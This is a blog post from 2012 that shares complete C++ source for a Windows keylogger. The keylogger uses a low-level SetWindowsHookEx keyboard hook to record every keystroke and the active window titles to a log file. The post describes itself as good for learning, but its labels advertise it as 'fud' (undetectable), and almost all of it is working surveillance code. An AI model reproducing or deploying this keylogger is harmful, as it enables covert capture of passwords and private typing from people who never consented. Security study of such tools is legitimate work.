Showing posts with label SetWindowsHookEx. Show all posts
Showing posts with label SetWindowsHookEx. Show all posts
January 04, 2012
[C++] Keylogger source using SetWindowsHookEx
22 comments:
Author:
tec
at
1/04/2012 07:34:00 pm
Labels:
c++ keylogger,
fud keylogger source,
projects,
SetWindowsHookEx
Compiled and tested on MS VC++ 2010 and WinXP.
Features
Read More
Features
- Fully commented source
- Captures capital and small alphabets, numbers, symbols
- Logs all special keys like tabs, alt, shift
- Uses low level keyboard hook to log keys to a text file
- Very optimized and resource friendly
- Good for learning
To start logging, compile and execute. To stop logging press CTRL + F12
/************************************************************ * A very basic Key logger in C++ * Author: Manish ************************************************************/ // Include header files #include#include // Initialize a keyboard HHOOK HHOOK KeyboardHook; // Function to write to a file void write(const char* c) { const char* fileLocation = "F:\\log.txt"; // Define the location of log file FILE *f = fopen(fileLocation,"a+"); // Open the log file in append mode if(f!=NULL) { fputs(c,f); // Write to end of the file fclose(f); // Close the file } } // The WIN API Message Loop void KeepAlive() { MSG message; while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Unhook and exit void Exit() { UnhookWindowsHookEx(KeyboardHook); exit(0); } // Is shift key down ? bool shift = false; // Store window HWND oldWindow = NULL; // Window text char cWindow[MAX_PATH]; // Callback function to be hooked LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { bool bControlKeyDown=0; // Get current state of capsLock bool caps = GetKeyState(VK_CAPITAL) < 0; KBDLLHOOKSTRUCT *p = (KBDLLHOOKSTRUCT *) lParam; if(nCode == HC_ACTION){ // Determine the current state of shift key if(p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT){ if(wParam == WM_KEYDOWN) { shift = true; } else { shift = false; } } // Check if F12 + CTRL is pressed, if yes -> exit bControlKeyDown = GetAsyncKeyState (VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1); if (p->vkCode == VK_F12 && bControlKeyDown) // If F12 and CTRL are pressed { Exit(); } // Start logging keys if(wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) // If key has been pressed { HWND newWindow = GetForegroundWindow(); if(oldWindow == NULL || newWindow != oldWindow){ // Get Active window title and store it GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow)); write("\nActive Window: "); write(cWindow); write("\n"); oldWindow = newWindow; } // Virtual key codes reference: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx switch(p->vkCode) // Compare virtual keycode to hex values and log keys accordingly { //Number keys case 0x30: write(shift?")":"0");break; case 0x31: write(shift?"!":"1");break; case 0x32: write(shift?"@":"2");break; case 0x33: write(shift?"#":"3");break; case 0x34: write(shift?"$":"4");break; case 0x35: write(shift?"%":"5");break; case 0x36: write(shift?"^":"6");break; case 0x37: write(shift?"&":"7");break; case 0x38: write(shift?"*":"8");break; case 0x39: write(shift?"(":"9");break; // Numpad keys case 0x60: write("0");break; case 0x61: write("1");break; case 0x62: write("2");break; case 0x63: write("3");break; case 0x64: write("4");break; case 0x65: write("5");break; case 0x66: write("6");break; case 0x67: write("7");break; case 0x68: write("8");break; case 0x69: write("9");break; // Character keys case 0x41: write(caps?(shift?"a":"A"):(shift?"A":"a"));break; case 0x42: write(caps?(shift?"b":"B"):(shift?"B":"b"));break; case 0x43: write(caps?(shift?"c":"C"):(shift?"C":"c"));break; case 0x44: write(caps?(shift?"d":"D"):(shift?"D":"d"));break; case 0x45: write(caps?(shift?"e":"E"):(shift?"E":"e"));break; case 0x46: write(caps?(shift?"f":"F"):(shift?"F":"f"));break; case 0x47: write(caps?(shift?"g":"G"):(shift?"G":"g"));break; case 0x48: write(caps?(shift?"h":"H"):(shift?"H":"h"));break; case 0x49: write(caps?(shift?"i":"I"):(shift?"I":"i"));break; case 0x4A: write(caps?(shift?"j":"J"):(shift?"J":"j"));break; case 0x4B: write(caps?(shift?"k":"K"):(shift?"K":"k"));break; case 0x4C: write(caps?(shift?"l":"L"):(shift?"L":"l"));break; case 0x4D: write(caps?(shift?"m":"M"):(shift?"M":"m"));break; case 0x4E: write(caps?(shift?"n":"N"):(shift?"N":"n"));break; case 0x4F: write(caps?(shift?"o":"O"):(shift?"O":"o"));break; case 0x50: write(caps?(shift?"p":"P"):(shift?"P":"p"));break; case 0x51: write(caps?(shift?"q":"Q"):(shift?"Q":"q"));break; case 0x52: write(caps?(shift?"r":"R"):(shift?"R":"r"));break; case 0x53: write(caps?(shift?"s":"S"):(shift?"S":"s"));break; case 0x54: write(caps?(shift?"t":"T"):(shift?"T":"t"));break; case 0x55: write(caps?(shift?"u":"U"):(shift?"U":"u"));break; case 0x56: write(caps?(shift?"v":"V"):(shift?"V":"v"));break; case 0x57: write(caps?(shift?"w":"W"):(shift?"W":"w"));break; case 0x58: write(caps?(shift?"x":"X"):(shift?"X":"x"));break; case 0x59: write(caps?(shift?"y":"Y"):(shift?"Y":"y"));break; case 0x5A: write(caps?(shift?"z":"Z"):(shift?"Z":"z"));break; // Special keys case VK_SPACE: write(" "); break; case VK_RETURN: write("\n"); break; case VK_TAB: write("\t"); break; case VK_ESCAPE: write("[ESC]"); break; case VK_LEFT: write("[LEFT]"); break; case VK_RIGHT: write("[RIGHT]"); break; case VK_UP: write("[UP]"); break; case VK_DOWN: write("[DOWN]"); break; case VK_END: write("[END]"); break; case VK_HOME: write("[HOME]"); break; case VK_DELETE: write("[DELETE]"); break; case VK_BACK: write("[BACKSPACE]"); break; case VK_INSERT: write("[INSERT]"); break; case VK_LCONTROL: write("[CTRL]"); break; case VK_RCONTROL: write("[CTRL]"); break; case VK_LMENU: write("[ALT]"); break; case VK_RMENU: write("[ALT]"); break; case VK_F1: write("[F1]");break; case VK_F2: write("[F2]");break; case VK_F3: write("[F3]");break; case VK_F4: write("[F4]");break; case VK_F5: write("[F5]");break; case VK_F6: write("[F6]");break; case VK_F7: write("[F7]");break; case VK_F8: write("[F8]");break; case VK_F9: write("[F9]");break; case VK_F10: write("[F10]");break; case VK_F11: write("[F11]");break; case VK_F12: write("[F12]");break; // Shift keys case VK_LSHIFT: break; // Do nothing case VK_RSHIFT: break; // Do nothing // Symbol keys case VK_OEM_1: write(shift?":":";");break; case VK_OEM_2: write(shift?"?":"/");break; case VK_OEM_3: write(shift?"~":"`");break; case VK_OEM_4: write(shift?"{":"[");break; case VK_OEM_5: write(shift?"|":"\\");break; case VK_OEM_6: write(shift?"}":"]");break; case VK_OEM_7: write(shift?"\"":"'");break; case VK_OEM_PLUS: write(shift?"+":"=");break; case VK_OEM_COMMA: write(shift?"<":",");break; case VK_OEM_MINUS: write(shift?+"_":"-");break; case VK_OEM_PERIOD: write(shift?">":".");break; default: DWORD dwMsg = p->scanCode << 16; dwMsg += p->flags << 24; char key[16]; GetKeyNameText(dwMsg,key,15); write(key); break; } } } // Forward the event to other hooks return CallNextHookEx(NULL,nCode,wParam,lParam); } // WinAPI main method int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) { // Write to file write("\n---------------------------------------------------------"); // Hook to all available threads KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL); if(KeyboardHook!=NULL) { // Keep alive till F12 + CTRL key press is detected - can also register Hotkey KeepAlive(); } // Exit the program return 0; }
Subscribe to:
Posts (Atom)